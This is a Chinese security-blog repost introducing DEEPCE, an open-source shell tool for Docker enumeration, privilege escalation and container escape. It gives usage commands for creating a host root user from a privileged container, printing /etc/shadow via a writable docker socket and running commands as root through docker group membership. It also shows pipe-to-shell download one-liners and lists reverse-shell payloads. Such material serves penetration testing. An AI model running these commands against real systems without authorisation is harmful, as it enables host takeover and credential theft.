前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Docker 枚举、特权升级和容器逃逸 (DEEPCE)

Docker 枚举、特权升级和容器逃逸 (DEEPCE)

作者头像
Khan安全团队
发布于 2023-02-23 06:38:41
发布于 2023-02-23 06:38:41
55000
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

Docker 枚举、特权升级和容器逃逸 (DEEPCE)

为了使其与最大数量的容器兼容,DEEPCE 是纯编写的sh,没有依赖性。如果可用,它将使用其他工具,例如 curl、nmap、nslookup 和 dig,但在大多数情况下不依赖于它们进行枚举。

枚举都不应该触及磁盘,但是大多数漏洞利用会创建新的容器,这将导致磁盘写入,并且一些漏洞利用会覆盖 runC,这可能具有破坏性,所以要小心!

可以使用以下单行之一将 DEEPCE 下载到主机或容器上。提示:下载到/dev/shm避免接触磁盘。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").c

枚举

以下是 DEEPCE 执行的枚举列表。

  • 容器 ID 和名称(通过反向 DNS
  • 容器 IP / DNS 服务器
  • 码头工人版本
  • 有趣的坐骑
  • 普通文件中的密码
  • 环境变量
  • 密码哈希
  • 容器中存储的常见敏感文件
  • 同一网络上的其他容器
  • 端口扫描其他容器,以及宿主机本身

漏洞利用

  • Docker 组提权
  • 特权模式主机命令执行
  • 裸露的 Docker

有效载荷

对于上述每个漏洞利用,都可以定义有效负载以利用主机系统。这些包括:

  • 反向 TCP 外壳
  • 打印 /etc/shadow
  • 添加新的根用户
  • 运行自定义命令
  • 运行自定义负载二进制文件
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh

漏洞利用

以下示例显示了可以执行的不同类型的漏洞利用和可用的有效负载。

  • 利用特权容器在主机操作系统上创建新的 root 用户:
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
  • 利用可写的 docker sock 文件打印内容/etc/shadow
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./deepce.sh --no-enumeration --exploit SOCK --shadow
  • 通过主机上 docker 组的成员身份升级到 root 并运行自定义负载
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"

高级用法

可以在不接触磁盘的情况下下载和运行 deepce,但是您将无法轻松设置参数(可以使用导出直接操作变量)。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh

https://github.com/stealthcopter/deepce

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-01-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Linux权限提升研究:自动化信息收集
在本文中,我们将介绍在基于Linux的设备上进行初始访问后,可用于后渗透阶段漏洞利用和枚举的一些自动化脚本研究。
FB客服
2021/07/02
1.9K0
技术干货 | Docker 容器逃逸案例汇集
当获得一个Webshell,我们的攻击点可能处于服务器的一个虚拟目录里,一台虚拟机或是一台物理机,甚至是在一个Docker容器里。
Bypass
2020/08/09
2.9K0
Docker容器逃逸
由于传播、利用本公众号亿人安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号亿人安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
亿人安全
2023/12/25
7290
Docker容器逃逸
Linux提权辅助工具
LinEnum 是一个高级 Bash 脚本,它从目标系统中提取了大量有用的信息,可以复制文件并进行导出,同时可以搜索包含关键字的文件。
LuckySec
2022/11/02
3K0
Linux提权辅助工具
云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。 Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。
没事就要多学习
2024/07/18
2210
云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
浅析docker的多种逃逸方法
Docker实现原理:https://zone.huoxian.cn/d/1034-docker
UzJu@菜菜狗
2022/04/25
6.2K0
浅析docker的多种逃逸方法
带你玩转docker容器逃逸
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。
Khan安全团队
2023/11/28
2.2K0
记一次渗透测试利用Portainer进行docker逃逸获得宿主机Ubuntu权限。
https://github.com/tangxiaofeng7/Shiroexploit
天钧
2020/11/03
6.5K0
记一次渗透测试利用Portainer进行docker逃逸获得宿主机Ubuntu权限。
404星链计划 | CDK:一款针对容器场景的多功能渗透工具
CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。
Seebug漏洞平台
2021/11/17
1.1K0
404星链计划 | CDK:一款针对容器场景的多功能渗透工具
云安全容器安全扫盲 之 CDK工具介绍与使用
MS08067安全实验室不会对圈内任何机构、公司发起任何舆论攻击、诋毁。也欢迎各界朋友各种形式的合作!
Ms08067安全实验室
2022/04/06
3.3K0
云安全容器安全扫盲 之 CDK工具介绍与使用
利用Docker容器的不安全部署获取宿主机权限
滥用容器( container)及逃逸的方法有多种,本文将讨论最基本的一种,即滥用docker socket来逃逸容器并在宿主机上以root身份执行代码。
FB客服
2018/12/19
2.1K0
利用Docker容器的不安全部署获取宿主机权限
云原生安全 | docker容器逃逸
随着云计算技术的不断发展,越来越多的企业开始上“云”。云原生计算基金会(CNCF)提出了云原生(Cloud Native)的概念,云原生包含了一组应用的模式,用于帮助企业快速,持续,可靠,规模化地交付业务应用。云原生由微服务架构,DevOps 和以容器为代表的敏捷基础架构组成。
tinyfisher
2020/08/13
2.3K0
云原生安全 | docker容器逃逸
Docker Privileged特权逃逸
在Docker中Privileged是一种特殊的权限模式,它允许Docker容器在启动时获取到与宿主机相同的权限级别。具体来说,Privileged权限可以让容器拥有以下能力:
Al1ex
2023/05/12
3.1K0
Docker Privileged特权逃逸
红蓝对抗之Linux内网渗透
上篇内网渗透(附录1)主要讲的是Windows这块,最近知识星球“腾讯安平密友圈”提到了一个问题“为什么内网渗透偏向于Windows”,笔者也在下面进行了相关回复,除了传统的信息收集、弱口令以外,Linux内网渗透也有很多可玩性。
腾讯安全应急响应中心
2020/12/11
1.9K0
红蓝对抗之Linux内网渗透
【云原生攻防研究】容器逃逸技术概览
近年来,容器技术持续升温,全球范围内各行各业都在这一轻量级虚拟化方案上进行着积极而富有成效的探索,使其能够迅速落地并赋能产业,大大提高了资源利用效率和生产力。随着容器化的重要甚至核心业务越来越多,容器安全的重要性也在不断提高。作为一项依然处于发展阶段的新技术,容器的安全性在不断地提高,也在不断地受到挑战。与其他虚拟化技术类似,在其面临的所有安全问题当中,「逃逸问题」最为严重——它直接影响到了承载容器的底层基础设施的保密性、完整性和可用性。
绿盟科技研究通讯
2020/02/25
3.2K0
【云原生攻防研究】容器逃逸技术概览
lse:一款专为渗透测试和CTF设计的Linux枚举工具
linux-smart-enumeration是一款专为渗透测试和CTF设计的Linux枚举工具,该工具可以帮助广大研究人员收集与本地Linux系统安全相关的信息。
FB客服
2024/07/22
1330
lse:一款专为渗透测试和CTF设计的Linux枚举工具
工具分享 | 一个检测容器逃逸的脚本
项目地址:https://github.com/teamssix/container-escape-check
TeamsSix
2022/09/20
8240
工具分享 | 一个检测容器逃逸的脚本
Docker Rootless 在非特权模式下运行 Docker
Rootless 模式允许以非 root 用户身份运行 Docker 守护进程(dockerd)和容器,以缓解 Docker 守护进程和容器运行时中潜在的漏洞。Rootless 模式是在 Docker v19.03 版本作为实验性功能引入的,在 Docker v20.10 版本 GA。
Se7en258
2021/12/31
7.8K0
Docker Rootless 在非特权模式下运行 Docker
Docker逃逸原理
Docker是当今使用范围最广的开源容器技术之一,具有高效易用的优点。然而如果使用Docker时采取不当安全策略,则可能导致系统面临安全威胁。
枪哥四海为家
2022/03/07
3.2K1
Docker逃逸原理
9 个容器环境安全红队常用手法总结
随着云原生的火热,容器及容器编排平台的安全也受到了行业关注,Gartner在近期发布的《K8s安全防护指导框架》中给出K8s安全的8个攻击面,总结如下:
iMike
2021/12/18
1.3K0
9 个容器环境安全红队常用手法总结
相关推荐
Linux权限提升研究:自动化信息收集
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验